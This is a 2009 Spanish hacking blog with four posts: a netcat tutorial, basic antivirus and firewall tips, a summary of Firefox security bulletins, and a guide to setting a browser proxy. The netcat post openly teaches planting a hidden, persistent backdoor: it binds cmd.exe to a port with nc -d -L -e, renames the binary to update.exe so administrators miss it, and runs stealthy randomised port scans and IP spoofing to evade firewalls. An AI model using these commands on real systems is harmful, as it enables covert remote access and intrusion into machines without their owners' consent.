viernes, 13 de noviembre de 2009

Net Cat (Nuestra herramienta :d)

Bueno, este tutorial va a ser breve ( y pretendo que sea explicativo para los newbies en el tema )

Bueno primero:

¿Que es NeTcAt?
Segun wikipedia ...

Netcat es una Herramienta de red originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Netcat permite a través de intérprete de comandos y con una sintaxis sencilla abrirPuertos TCP/UDP en un (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a HOST MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos)

Bueno eso (basicamente es netcat)

Ahora Dr [F]
Como lo usamos..?

Bueno sencillo primero lo tenemos que bajar nuestro querido netcat (nc)
ademas, necesitaremos una herramienta llamada Quick Batch Compiler, lo que hara es compilar nuestro programa (lo veremos mas adelante) en modo oculto.
Bueno sin mas preambulo, les dejo nuestro querido NC

http://rapidshare.com/files/308025177/nc.exe.html

Bueno, ahora empezemos, primero, cabe destacar que nuestro netcat, se maneja mediante lineas de comandos (MS DOS)






-i Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.
-g Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.
-G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.
-l Activa el modo escucha de nc.
-L Activa el modo escucha de nc pero con más interés.
-n Indica a nc que no realice ninguna consulta de nombres de hosts.
-o Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.
-p Le permite especificar el puerto local que va a utilizar nc.
-r Nc elegirá aleatoriamente los puertos locales y remotos.
-s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
-t Es capaz de controlar la negociación de opciones Telnet.
-u Indica a nc que utilice UDP en lugar de TCP.
-v Informa el estado de nc, si pones otra –v podrás obtener más información.
-w Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.
-z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo

Obtener acceso remoto a una shell

Si se ejecuta el comando nc.exe -l –p4455 –e cmd.exe desde una ventana del símbolo del sistema en una plataforma basada en Windows NT o Windows 2000, cualquiera que realice un Telnet al puerto 4455 de dicha plataforma se encontrará con una shell DOS sin tener que iniciar una sesión en ella.





Bastante elegante, pero también da un poco de miedo. Casi sin esfuerzos acabamos de obtener un indicador de comandos en el sistema atacado. Naturalmente, en los sistemas Windows NT y Windows 2000, tendrá los mismos privilegios y servicios que el usuario que ejecute Netcat. Si creamos de esta manera una puerta trasera en Windows 95 y Windows 98obtendremos un control completo.
Vamos a seguir profundizando en este comando, recuerden que de forma predeterminada Netcat se ejecutará en la ventana DOS que se haya iniciado, este hecho significa que la ventana de control de comandos tendrá que permanecer abierta mientras Netcat se encuentre en ejecución. Emplearemos la opción –d para separarla del indicador de comandos.

C:\>nc.exe –l –p 4455 –d –e cmd.exe

De ésta forma, podremos ocultar una puerta trasera basada en Netcat.

Sin embargo si alguien realiza un Telnet al puerto 4455 y se conecta, tan pronto como se finalice la conexión, Netcat pensará que su trabajo ha terminado y dejará de escuchar. Para evitar esto utilizaremos la opción –L diciéndole a Netcat que escuche con más interés incluso después de haber finalizado la conexión.

C:\>nc.exe –p 4455 –d –L –e cmd.exe

Esto nos permitirá volver al sistema hasta que el administrador de dicho sistema descubra la puerta trasera. Y para evitar que nos descubra podemos cambiar el nombre de nc.exe por cualquier otra cosa. Nota: en este ejemplo yo tengo nc.exe que voy a mover en C: y no en C:\Windows\System32



Cualquiera podrá ignorar algo tan aparentemente inofensivo como update.exe. Otra característica de Netcat es que si lo utilizamos sin ninguna opción en la línea de comandos, nos pedirá que la introduzcamos en la primera línea de la entrada estándar.



EXPLORACION SILENCIOSA DE PUERTOS

Como Netcat puede hablar con un rango de puertos, un uso muy obvio sería utilizarlo como explorador de puertos. La opción –z es la respuesta. Ésta opción le dirá a Netcat que envía una determinada cantidad de datos a algún puerto, pero dicha cantidad solo será suficiente para saber si el puerto está abierto o no. En éste caso utilizaremos la opción –v o –vv ya que sin por lo menos una –v no podremos ver el resultado de la exploración. Aquí estoy haciendo una exploración de puertos a 127.0.0.1 desde el 139 hasta el 145. Obtuve como resultado que solo se encuentran abiertos el 139,141 y 142.



Pero esta forma de hacerlo no es la mas correcta que digamos porque algunas aplicaciones de cortafuegos, bloquearan determinada dirección IP si reciben demasiadas conexiones sobre ella en un periodo muy corto de tiempo. Para que no nos suceda esto Netcat permite hacer exploraciones de una manera más discreta, tan discreta que no parecerá una exploracion de puertos. Se podrá utilizar la opción –i y configurar un intervalo de prueba y la opción –r para lo haga de forma aleatoria. Esto debe quedar de la siguiente forma;



En la instrucción anterior se le dice a Netcat que explore los puertos de la IP 127.0.0.1 desde el 139 hasta el 145 de manera aleatoria, habiendo 10 segundos entre uno y otro. Y Netcat me ha dicho que solo se encuentran abiertos el 139 y el 145.

Puede hacerse este mismo procedimiento para los puertos UDP solo agregándole –u a la línea de comandos.

SUPLANTAR UNA DIRECCION IP

Suplantar una dirección IP resulta sencillo. Los cortafuegos que realizan enmascaramient o o una traducción de las direcciones de red suplantan diariamente direcciones IP. Estos dispositivos toman un paquete desde una dirección IP interna, cambian la dirección IP origen del paquete a su propia dirección IP, lo envían por la red y deshacen las modificaciones cuando vuelven a recibir los datos desde el destino. Por ello, decimos que modificar los contenidos de la dirección IP origen en un paquete IP resulta sencillo. Lo que si es difícil es ser capaz de recibir datos desde una dirección IP suplantada.

Netcat dispone de la opción –s que nos permitirá especificar la dirección IP que deseemos. Cualquiera podria iniciar una exploración de puertos utilizando la opción –s para hacer pensar que estan siendo explorado por Microsoft o el FBI. Sin embargo, el problema nos viene cuando deseamos reenviar las respuestas emitidas por el puerto suplantado a nuestra dirección IP real. Supongamos, por ejemplo, que el host de destino piensa que ha recibido una petición de conexión de Microsoft, intentará enviar un mensaje de reconocimiento a dicha ip de Microsoft. Naturalmente, esta dirección IP no tendrá idea de lo que está hablando el host de destino y enviará un reset. ¿Cómo podemos enviar la información de vuelta a la dirección IP real sin que seamos descubiertos?

En lugar de atacar a la maquina destino, la única otra opción viable es utilizar el encaminamiento dependiente del origen. El encaminamiento dependiente del origen permite a una aplicación de red especificar la ruta que desea seguir para llegar a su destino.

Existen dos tipos de encaminamiento dependiente del origen: estricto y relajado. El encaminamiento dependiente del origen estricto significa que el paquete debe especificar cada salto a realizar en la ruta hasta llegar al host de destino. Algunos routers y otros dispositivos de red siguen permitiendo el encaminamiento dependiente del origen estricto, pero muy pocos permiten el encaminamiento dependiente del origen relajado. El encaminamiento dependiente del origen relajado indica a los routers y a los dispositivos de red que los routers pueden efectuar la mayor parte del encaminamiento hasta llegar al host de destino, este proceso nos permitirá hacer que el paquete pase por nuestra maquina al regresar. Utilizando este método el encaminamiento dependiente del origen puede permitir que suplantemos una direccion IP y que obtengamos las respuestas a su viaje de vuelta. La mayoría de los routers ignoran las opciones del encaminamiento dependiente del origen, pero no todos.

La opción –g de Netcat nos permitirá especificar hasta 8 saltos que deberá dar el paquete antes de llegar a su destino, por ejemplo: nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 10.10.9.50 23 entrará en contacto con el puerto telnet en 10.10.9.50, pero si las opciones del encaminamiento dependiente del origen se encuentran activadas sobre routers intermedios, tráfico se verá forzado a seguir la ruta a través de estas 4 ubicaciones antes de alcanzar su destino. Si intentamos nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 –G 12 10.10.9.50 23, en este comando estaremos especificando un puntero de salto utilizando la opción –G. La opción –G configurará el puntero de salto al n-simo byte (en este caso el duodecimo) y como las direcciones IP tienen 4 bytes de longitud, el puntero de salto comenzará en 10.10.7.4. Por lo que en su camino a 10.10.9.50, el tráfico necesitará atravesar únicamente las dos ultimas maquinas (porque de acuerdo con el puntero de salto ya hemos estado en las primeras). Sin embargo en el viaje de vuelta el paquete si pasará por las 4 maquinas.

Bueno, este tutorial, fue sacado del foro cph.
Este mismo fue echo por zazu_17

sábado, 7 de noviembre de 2009

Consejos sobre seguridad Informatica

Bueno, cansado de que me pregunten " ¿Como hago para que no me entren virus ? ¿Ayudame a prevenir este virus ..."

Les tengo que decir una cosa que les dolera a todos..

La seguridad informatica no existe... Si alguien quiere meterles un virus ( y sabe lo suficiente )
que no les quepa la menor duda que lo haran, si no pregunten a los de defcon :d

Bueno entonces para que se queden un poco mas seguros les dare algunos consejitos basicos par ala seguridad de sus ordenadores

1) Lo primero, sera instalar un AntiVirus, se que esto puede ser comico y que puden estar diciendo es obvio que hay que instalar un antivirus, pero no es poca la gente que se olvida de eso.
Un dato: Los antivirus de hoy se centran mas en la prevencion

2) Un Anti Spywere nunca esta demas a la hora de seguridad informatica, ya que muchas empresas nos espian para ver con que frecuencia entramos a sus Paginas Webs. o cosas asi por el estilo

3) Tener un Anti Malware nunca esta demas ya que como dijimos antes lo antivirus se centran mas en la prevencion que en la desinfeccion...
Si me preguntan "Que anti malware tenes Dr [F]"
Yo tengo solamente 2
El Malware Bytes y EL Dr web...
Los dos son desinfectores de Malware y reparadores de archivos modificados (como puede ser el Host)

4) Recomiendo tambien tener un Firewall o Muro de fuego... este pequeño artefacto bloquea conexiones peligrosas, y algunos evitan escaneos a determinados puertos...
Yo recomiendo el Comodo , el Zone Alarm Pro o el Ashampoo pero esto es subjetivo ya que a cada uno le puede ir diferente...

5) Innore o cierre esas paginas que solicitan cualquier tipo de dato privado, ya sea Nombres, Contraseñas, direcciones, etc..
A esas tecnicas se las denomina Pishing (robar datos ).

6) Es recomendable (aunque yo no lo haga ) cada cierto tiempo algunas copias de seguridad de sus archivos importantes ya que nunca se sabe cuando se puede colar un virus y destruir el Ordenador

7) Si tiene Windows, es recomendable, bajar las actualizaciones de la pagina oficial o llendo a

Inicio ---> Todos Los programas ---> Windows Update ( y ahi sigan los pasos )

8) Mucho cuidado con archivos enviados por correo electronico (adjuntos ) y cuando algun contacto intente enviarte algo por msn...
Si el contacto es conocido tambien duda, ya que hay gusanos que se mandan asi mismos.

9) Prestar especial atencion a archivos descargados de redes peer to peer (P2P)
un ejemplo de red p2p es el Ares, Emule, etc
Los gusanos de ahora aprovechan a replicarse por redes P2P (!!!! Cuidado !!!!!)

10) Estaria bueno que visiten paginas de seguridad informatica para informarse acerca de vulnerabilidades

Todo esto que acabo de decir es mas que obvio que no es obligatorio, si no recomendable para su seguridad en particular

Bueno espero que les haya gustado... Con esto estaran a salvo de cualquier hacker newbie.. xD

Bueno nos vemos.d

miércoles, 4 de noviembre de 2009

Boletines de Seguridad para Mozilla

Once boletines de seguridad para Mozilla Firefox

La Fundación Mozilla ha publicado once boletines de seguridad para
solucionar diversas vulnerabilidad es en Mozilla Firefox que podrían ser
aprovechadas por un atacante remoto para manipular o revelar información
sensible, saltarse restricciones de seguridad o comprometer un sistema
vulnerable.


A continuación se detallan las vulnerabilidad es publicadas:


El primero de los problemas reside en un error en la forma en la que
Firefox maneja el historial de formularios. Esta vulnerabilidad podría
permitir a un atacante remoto robar los datos guardados y hacer que el
explorador rellene automáticamente los formularios a través de una
página web especialmente manipulada.

Otro error se presenta en la forma en que Firefox nombra a los ficheros
temporales de descarga. Un atacante local podría aprovechar este
problema para ejecutar código arbitrario a través de un cambio del
contenido de los ficheros temporales de descarga.

La creación recursiva de web-workers en JavaScript puede ser empleada
para crear un conjunto de objetos cuya memoria puede ser liberada antes
de su uso. Estas condiciones habitualmente producen una denegación de
servicio, que potencialmente podrían permitir a un atacante la ejecución
de código arbitrario.

Múltiples vulnerabilidad es se deben a la forma en que Firefox procesa
el contenido web incorrecto, un atacante remoto podría provocar una
denegación de servicio y potencialmente ejecutar código arbitrario a
través de una página web especialmente manipulada.

Otro boletín trata un error en el procesador de imágenes GIF de Firefox
que podría causar un desbordamiento de memoria basada en heap. Un
atacante remoto podría aprovechar este problema para causar una
denegación de servicio y potencialmente ejecutar código arbitrario a
través de una imagen GIF especialmente manipulada.

Otro error corregido se presenta en las rutinas de conversión de cadena
a coma flotante de Firefox, que podría provocar un desbordamiento de
memoria basado en heap. Un atacante remoto podría aprovechar este
problema para causar una denegación de servicio y potencialmente
ejecutar código arbitrario con los permisos del usuario a través de una
pagina web con código JavaScrip especialmente manipulado.

Otro boletín se refiere a un error en la forma en que Firefox maneja la
selección de texto. Un atacante remoto podría aprovechar este problema
para ver el texto seleccionado por el usuario desde un dominio diferente
a través de un sitio web especialmente manipulado.

Un error se presenta en la forma en que Firefox muestra el nombre cuando
se descarga un archivo, lo que permitiría mostrar nombres diferentes en
la barra de título y en el cuerpo de dialogo. Un atacante remoto podría
realizar un ataque de hombre en el medio y ejecutar código arbitrario a
través de un fichero especialmente manipulado.

Mozilla también ha actualizado diversas librerías de terceras partes
para corregir fallos en el tratamiento de la memoria y bugs de
estabilidad.

Se recomienda actualizar a Mozilla Firefox versiones 3.5.4 o 3.0.15 :

PD: Esto no fue publicado por mi :Cheesy

espero que lo disfruten y descargen las actualizaciones :d

martes, 3 de noviembre de 2009

Proxy con navegadores

Tutorial Proxy en Navegadores...

Primero: ¿Que es un proxy ?

En el contexto de las redes informáticas, el término proxy hace referencia a un programa o dispositivo que realiza una acción en representación de otro. Su finalidad más habitual es la de servidor proxy, que sirve para permitir el acceso a Internet a todos los equipos de una organización cuando sólo se puede disponer de un único equipo conectado, esto es, una única dirección IP.

Wikiipedia

buenas,soy sark,aqui os voy a dejar un tutorial de como ocultar la ip mediante proxy,con los navegadores google chrome,explorer y mozila firefox.

lo primero que vamos a acer es buscar un proxy que funcione desde aqui:

http://www.proxys.com.ar/

Es mas conveniente que el proxy sea de tu pais (para mejor conexiones a internet .. )

cogan las que mas le comvenga o mas cerca esten de ese servidor,para este tutorial e escojido esta:

IP: 212.166.64.12 PUERTO: 3128

bueno,aora nos vamos a nuestro navegador,yo aora lo voy a explicar con google chrome.

nos vamos a:

herramientas > opciones > avanzadas > cambiar la configuracion del proxy.

seleccionamos nuestro acceso a internet i pinchamos encima de el,i nos vamos a configuración.

vamos al apartado de servidor proxy i pinchamos en utilizar proxy para esta conexion.

ponemos en direccion ip que mas nos convenga,es este caso pondremos:

direccion : 212.166.64.12 puerto: 3128 (servidor activo a dia 30-10-2009)

y pulsamos a aceptar,y ya tenemos nuestro proxy listo.





Ahora con navegador mozila firefox.

nos vamos a :

herramientas > opciones > avanzado > red > configuracion



i pinchamos en configuracion manual del proxy.

en proxy HTTP ponemos las que mas nos convenga,(en este caso 212.166.64.12)

y en puerto : 3128 (servidor activo a dia 30-10-2009)

i pinchamos en utilizar proxy para todo (abajo de donde pones el proxy)

y aceptar,y ya tenemos configurado nuestro proxy.





bueno...i por ultimo con explorer.

nos vamos a herramientas > opciones de internet > conexiones

elegimos nuestra conexion a internet i pinchamos en comfiguracion.

vamos al apartado de servidor proxy i pinchamos en utilizar proxy para esta conexion.

ponemos en direccion ip que mas nos convenga,es este caso pondremos:

direccion : 212.166.64.12 puerto: 3128 (servidor activo a dia 30-10-2009)

y pulsamos a aceptar,y ya tenemos nuestro proxy listo.


100% por 100% tutorial creado por sark.